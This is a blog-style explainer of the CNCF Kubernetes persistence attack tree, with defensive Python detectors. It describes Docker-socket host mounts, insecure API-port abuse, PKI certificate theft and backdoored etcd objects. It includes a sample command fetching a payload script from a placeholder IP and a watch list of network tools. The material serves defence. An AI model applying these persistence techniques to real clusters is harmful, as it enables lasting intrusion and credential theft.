Understanding the CNCF Persistence Attack Tree in K8s

Persistence is the set of techniques an attacker uses to stay inside a system after gaining access. They don’t just come and go. They build a secret base. From there, they launch attacks, steal data, or spread across the cluster. If we don’t detect them early, they hide and grow stronger.

In Kubernetes, persistence is hard to detect because clusters are dynamic. Pods die. Nodes restart. Workloads shift. But attackers adapt. They use clever tricks to survive each change.

The CNCF Financial Services User Group created an attack tree that shows five common ways attackers create persistence in Kubernetes. In this post, we’ll explore each branch to understand the different persistence mechanisms an attacker could use against our K8s clusters.

The Persistence Attack Tree

The goal of this attack tree is to map out the different paths an attacker can take to stay inside a Kubernetes cluster, each offering a different level of permanence. The tree splits into two main branches.

The first branch explores the paths available after an attacker gains access to a container. From there, they take advantage of misconfigurations in the cluster. These weaknesses allow them to stay in the system, even if containers, pods, or entire nodes are restarted.

The second branch explores a direct strategy: accessing and reading secrets stored within the cluster. By uncovering these sensitive details, an attacker can move deeper into the system, exploiting weak points and establishing a lasting presence.

Across the two branches, the CNCF attack tree distinguishes types of persistence by how resilient the attacker’s foothold is in the K8s environment. The CNCF considers five types of persistence:

Foothold with no resilience
Foothold with resilience to container restart
Foothold with resilience to Pod deletion/creation
Foothold with resilience to Node restart
Foothold with resilience to Node recycling (e.g. restore from etcd backup)

Let’s look at each of them in detail.

Foothold with no resilience

This kind of access is fragile. If the container restarts or is deleted, the attack ends and the intruder loses access. It seems harmless, but it’s not. Even though this is a short-lived entry point, it still gives the attacker a chance to act.
The entry point for this path is a compromised container. Once inside, the attacker will try to start a new process in that container.

For the attacker, it’s better to act from inside the existing container than to create new pods or containers. Why? Because new workloads in the K8s cluster look more suspicious and are easier to detect.

To do this, the attacker often uses what’s already there. Many containers that are not properly secured come with built-in tools: package managers, scripting languages, and network utilities. These tools become weapons. The attacker uses them to download code, connect to remote systems, or scan the network. Because the activity comes from trusted software already present in the image, it is difficult to detect and will probably not trigger alerts.

The downloaded tools often serve one purpose: to help the attacker move forward. They may use them to raise their access level, maintain control, or reach out to other parts of the cluster. From this single container, the attacker starts looking for other targets—pods, services, or even outside servers. This is how a simple access point can lead to lateral movement across the system.
Even without resilience, this kind of access can damage the cluster. We must not ignore it. Early detection is critical.
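
One way to catch this kind of short-lived activity early is to watch for download or network tools starting inside a container that normally never runs them. The sketch below is only an illustration in Python, not a real detection engine: the watch list and the flag_suspicious helper are assumptions made for this example, and the command lines would have to come from whatever runtime monitoring we already have in place.

```python
import shlex
from pathlib import PurePosixPath

# Hypothetical watch list: tools an attacker commonly reuses inside a container.
SUSPICIOUS_TOOLS = {"curl", "wget", "nc", "ncat", "nmap", "apt", "apt-get", "apk", "pip"}


def flag_suspicious(command_lines):
    """Return the command lines whose executable is on the watch list."""
    flagged = []
    for line in command_lines:
        parts = shlex.split(line)
        if not parts:
            continue
        # Compare only the binary name, so /usr/bin/curl matches "curl".
        if PurePosixPath(parts[0]).name in SUSPICIOUS_TOOLS:
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    # Example process list for an NGINX container (made-up data).
    observed = [
        "nginx -g 'daemon off;'",
        "/usr/bin/curl -fsSL http://203.0.113.10/payload.sh",
        "apt-get install -y nmap",
    ]
    for line in flag_suspicious(observed):
        print("suspicious:", line)
```

A watch list like this only makes sense per workload: a package manager running in a build container is normal, while the same command in a production web server is worth an alert.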

Foothold with resilience to container restart

In this scenario, the attacker again starts from a compromised container. Once inside, they can try to establish persistence by reaching configuration files stored on a volume mounted into the container. This might also give the attacker broader access to applications and services across the cluster. So, to follow this attack path, the attacker first needs to find a container whose volume holds the configuration files of the app it runs.

If the attacker manages to modify those configuration files, they can change settings that let them keep access even if the container restarts. For example, they might alter an NGINX configuration to expose sensitive files or disable authentication checks. If the files live on a mounted volume, those changes don’t disappear when the container restarts. They stay in place, written outside the container’s temporary file system.

To activate these changes, the attacker may trigger a container restart. Once the container starts again, the modified settings take effect. At that point, the attacker has succeeded. The configuration is now poisoned, and the attack persists across restarts.
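
Since this path depends on silently changing files on a volume, one possible countermeasure is to compare the configuration directory against known-good hashes. The Python sketch below assumes we recorded a baseline of SHA-256 digests at deploy time; the function names and the baseline format are hypothetical, chosen only for this example.

```python
import hashlib
from pathlib import Path


def sha256_of(path):
    """Return the SHA-256 hex digest of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def changed_files(baseline, config_dir):
    """Compare files under config_dir with a {relative_path: digest} baseline.

    Returns the sorted relative paths that were modified, added, or removed.
    """
    root = Path(config_dir)
    current = {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in root.rglob("*")
        if p.is_file()
    }
    # A path drifts if its digest differs or it exists on only one side.
    drift = {
        name
        for name in baseline.keys() | current.keys()
        if baseline.get(name) != current.get(name)
    }
    return sorted(drift)
```

Running a check like this before the application starts, for instance from an init container, would surface a poisoned configuration before the restart activates it. Mounting configuration volumes read-only where the app allows it removes the write path altogether.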

Foothold with resilience to pod deletion/creation

In the previous scenario, if the configuration files that the attacker modifies are stored in a persistent volume, the changes also survive pod deletion and (re)creation, because a persistent volume’s lifecycle is independent of any single pod.
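
The difference between this level and the previous one comes down to the volume type. As a rough sketch, the Python snippet below classifies the entries of a pod’s spec.volumes by what their data survives. The classify_volumes helper and its labels are assumptions for illustration, and it covers only three common volume types.

```python
def volume_resilience(volume):
    """Classify one spec.volumes entry by what its data survives."""
    if "persistentVolumeClaim" in volume:
        # Backed by a PersistentVolume, which outlives the pod.
        return "pod deletion"
    if "hostPath" in volume:
        # Stored on the node's disk; visible again only on the same node.
        return "pod deletion (same node)"
    if "emptyDir" in volume:
        # Kept across container restarts, removed when the pod is deleted.
        return "container restart"
    return "unknown"


def classify_volumes(pod_spec):
    """Map each volume name in a pod spec (as a dict) to its resilience."""
    return {
        volume.get("name", ""): volume_resilience(volume)
        for volume in pod_spec.get("volumes", [])
    }


if __name__ == "__main__":
    spec = {
        "volumes": [
            {"name": "cache", "emptyDir": {}},
            {"name": "conf", "persistentVolumeClaim": {"claimName": "app-conf"}},
        ]
    }
    print(classify_volumes(spec))
```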

Foothold with resilience to Node restart

To achieve this level of resilience, the attacker will look for a serious weakness within the container: a mounted Docker socket. Why is this a vulnerability?
In many container setups, especially in Kubernetes nodes or developer environments, the host’s Docker socket (/var/run/docker.sock) is mounted inside a container. This socket is the communication interface between Docker CLI or API clients and the Docker daemon running on the host.
When we mount this socket inside a container, we allow the container to talk directly to the Docker daemon as if it were the host. This is often done to run containers inside containers ("Docker-in-Docker") or to allow tools like CI/CD agents to manage containers on the host.
If a container has the Docker socket mounted and an attacker breaks into it, they can escape the container and interact with the host's Docker engine. The attacker can then exploit this vulnerability to get persistence in three ways:

Deploy Host-Level Containers: They can run new containers outside the Kubernetes context, directly on the host, detached from cluster policies or RBAC. These containers may contain backdoors, cryptominers, or networking tools. If the attacker deploys a container using the Docker socket outside the control of Kubernetes, the cluster won’t track or manage it. They can configure the container to run in the background and restart on boot using Docker’s restart policies (--restart=always). Since this bypasses Kubernetes entirely, the attacker’s container or system process remains active even if the node restarts, the kubelet restarts, or the cluster is cleaned at the pod level.
Bind-Mount the Host Filesystem: The attacker can create containers with access to the host’s file system using mounts like -v /:/host, allowing them to tamper with system files such as the unit files under /etc/systemd/system/, install rootkits, or set up cron jobs on the host. Because these files are part of the host boot process, they run automatically when the node restarts, which gives the attacker persistence on the node.
Add Services or System-Level Changes: By writing to host locations or tampering with startup scripts, the attacker can set up processes or daemons that restart automatically when the node restarts.
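
Because all three techniques start from a mounted Docker socket, a simple audit is to look for pods that mount it. The sketch below is a minimal Python example that works on pod objects as plain dictionaries, such as the items list returned by kubectl get pods -A -o json. The function name is hypothetical, and including /run/docker.sock in the path set is an assumption based on /var/run usually being a symlink to /run.

```python
# Socket paths to look for. The second entry is an assumption: on many
# distributions /var/run is a symlink to /run.
DOCKER_SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def pods_mounting_docker_socket(pods):
    """Return (namespace, name) for each pod with a hostPath volume on the Docker socket."""
    hits = []
    for pod in pods:
        meta = pod.get("metadata", {})
        for volume in pod.get("spec", {}).get("volumes", []):
            host_path = volume.get("hostPath") or {}
            if host_path.get("path", "").rstrip("/") in DOCKER_SOCKET_PATHS:
                hits.append((meta.get("namespace", "default"), meta.get("name", "")))
                break  # one hit per pod is enough
    return hits


if __name__ == "__main__":
    # Made-up pod list for illustration.
    pods = [
        {
            "metadata": {"namespace": "ci", "name": "build-agent"},
            "spec": {"volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}}]},
        },
        {
            "metadata": {"namespace": "shop", "name": "web"},
            "spec": {"volumes": [{"name": "tmp", "emptyDir": {}}]},
        },
    ]
    print(pods_mounting_docker_socket(pods))
```

This check only matches the socket path itself. A hostPath mount of a parent directory such as /var/run or / would expose the socket too, so a stricter audit should treat those as findings as well.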

Foothold with resilience to Node recycling (e.g. restore from etcd backup)

How can an attacker get this level of persistence? There are three possible paths.

The first option for the attacker is to target the Kube API server. In early Kubernetes versions (or misconfigured environments), the API server might expose an insecure, unauthenticated interface on localhost:8080. This endpoint does not require authentication and was originally intended for local debugging or internal communication. If a container running on the API server’s node can access this port, especially if it’s privileged or has access to the host network, it can send requests directly to the Kubernetes API without needing any credentials.
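
On clusters old enough to still honor it, this behavior is controlled by the kube-apiserver --insecure-port flag, where 0 disables the port. As a hedged sketch, the Python helper below reads that value from a list of command-line arguments, for example taken from the API server’s static pod manifest. The function name is hypothetical, and what a missing flag means depends on the Kubernetes version, so the helper returns None in that case instead of guessing.

```python
def insecure_port(apiserver_args):
    """Return the --insecure-port value as an int, or None if the flag is absent."""
    for index, arg in enumerate(apiserver_args):
        if arg.startswith("--insecure-port="):
            return int(arg.split("=", 1)[1])
        # Also accept the space-separated form: --insecure-port 8080
        if arg == "--insecure-port" and index + 1 < len(apiserver_args):
            return int(apiserver_args[index + 1])
    return None


if __name__ == "__main__":
    # Made-up argument list for illustration.
    args = ["kube-apiserver", "--insecure-port=8080", "--secure-port=6443"]
    port = insecure_port(args)
    if port is None:
        print("flag not set: behavior depends on the Kubernetes version")
    elif port == 0:
        print("insecure port disabled")
    else:
        print(f"insecure port enabled on {port}")
```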

Once an attacker gains access to a container with access to port 8080, they can talk directly to the API server as if they were an admin. This allows them to:

Create Malicious Kubernetes Resources

They can create or modify core cluster objects like Deployments, DaemonSets, CronJobs, and MutatingWebhookConfigurations.

Inject into etcd

The API server writes all Kubernetes state to etcd, the central database for the cluster. When a node is recycled or restored, the cluster state it rejoins is read back from etcd. So, if the attacker creates a malicious Deployment, a workload that pulls a backdoored image, or an autonomous Job via the API server, those objects get written into etcd and survive any node wipe.

Set Restart Policies or Scheduled Jobs
By creating resources that are designed to run again and again, such as a CronJob that spawns backdoor pods daily, the attacker maintains presence even if the pods or nodes are deleted.
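
Since these objects live in etcd like any legitimate resource, one way to spot them is to compare what is running against what we expect to be running, for example the manifests we keep in Git. The Python sketch below assumes both sides are already available as plain data: the live objects as dictionaries and the expected ones as (kind, namespace, name) tuples. All names here are hypothetical.

```python
# Kinds that keep recreating workloads or rewrite them at admission time.
PERSISTENT_KINDS = {
    "Deployment",
    "DaemonSet",
    "CronJob",
    "MutatingWebhookConfiguration",
    "ValidatingWebhookConfiguration",
}


def resource_key(obj):
    """Build a (kind, namespace, name) key for a Kubernetes object dict."""
    meta = obj.get("metadata", {})
    # Cluster-scoped objects such as webhook configurations have no namespace.
    return (obj.get("kind", ""), meta.get("namespace", ""), meta.get("name", ""))


def unexpected_resources(live_objects, expected_keys):
    """Return the keys of persistent-by-design objects that are not expected."""
    return sorted(
        resource_key(obj)
        for obj in live_objects
        if obj.get("kind") in PERSISTENT_KINDS
        and resource_key(obj) not in expected_keys
    )


if __name__ == "__main__":
    # Made-up cluster contents for illustration.
    live = [
        {"kind": "Deployment", "metadata": {"namespace": "shop", "name": "web"}},
        {"kind": "CronJob", "metadata": {"namespace": "kube-system", "name": "node-sync"}},
    ]
    expected = {("Deployment", "shop", "web")}
    for key in unexpected_resources(live, expected):
        print("not in the expected set:", key)
```

An allowlist comparison like this does not prove an object is malicious, but it narrows the review to the resources nobody on the team declared.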

The second option for the attacker is to target the PKI, creating new certificates or using existing certificates and private keys to authenticate as trusted entities.

How Can an Attacker Compromise the PKI?

If an attacker gets access to a container—especially a privileged one—they may be able to:

Mount the Host Filesystem:
If the container can access the host, they can read sensitive paths like:

/etc/kubernetes/pki/
/var/lib/kubelet/pki/
or wherever the PKI material is stored on that node

Steal or Copy Certificates:
They extract:

Client certificates for kubelets, admins, or controllers
Private keys
The cluster’s CA certificate (possibly also the key)

Create Their Own Certificates:
If the attacker gets the CA private key, they can generate new, valid Kubernetes client certificates. These certificates can impersonate nodes, users, or even the kube-apiserver itself.
Use Certificates to Access the API Server:
The attacker can now talk to the Kubernetes API as any valid user or component. They are no longer bound to a specific node or container. They’ve unlocked the front door to the entire control plane.
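
The first step in this chain is a host mount that reaches the PKI directories, and that can be checked in advance. The Python sketch below decides whether a given hostPath would expose one of the two directories mentioned above, either because it contains them (for example / or /etc) or because it points inside them. The exposes_pki helper is hypothetical, and the path list should be adapted to wherever the PKI material is stored on our nodes.

```python
from pathlib import PurePosixPath

# Directories from the text above; adjust to the node's actual PKI layout.
PKI_PATHS = [
    PurePosixPath("/etc/kubernetes/pki"),
    PurePosixPath("/var/lib/kubelet/pki"),
]


def exposes_pki(host_path):
    """Return True if mounting host_path would expose PKI material."""
    mount = PurePosixPath(host_path)
    for pki in PKI_PATHS:
        # The mount is the PKI directory or one of its ancestors ("/", "/etc").
        if mount == pki or mount in pki.parents:
            return True
        # The mount points at something inside the PKI directory.
        if pki in mount.parents:
            return True
    return False


if __name__ == "__main__":
    for candidate in ["/", "/etc", "/var/log", "/var/lib/kubelet/pki"]:
        print(candidate, "->", exposes_pki(candidate))
```

Comparing path components instead of string prefixes avoids false matches on sibling directories whose names merely start with the same characters.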

With that, the attacker can get unrestricted access to the cluster. They can then search for privileged workloads, such as containers or pods running in privileged mode, which would let them access, and eventually control, resources on the host node.

Lastly, the third option for an attacker is, after compromising the PKI, to use the Kube API server client certificate to target etcd, the source of truth for the whole cluster. With valid client certificates, the attacker can create or modify Kubernetes objects using the API server, just like any cluster admin. They can inject:

Backdoored Deployments
DaemonSets that respawn across the cluster
CronJobs that re-establish access
Mutating or validating admission webhooks that modify workloads

These objects are stored in etcd. Even if a node is recycled, wiped, or rebuilt from backup, etcd will still hold the malicious resources. Kubernetes will faithfully restore and run them—because it doesn’t know they’re malicious.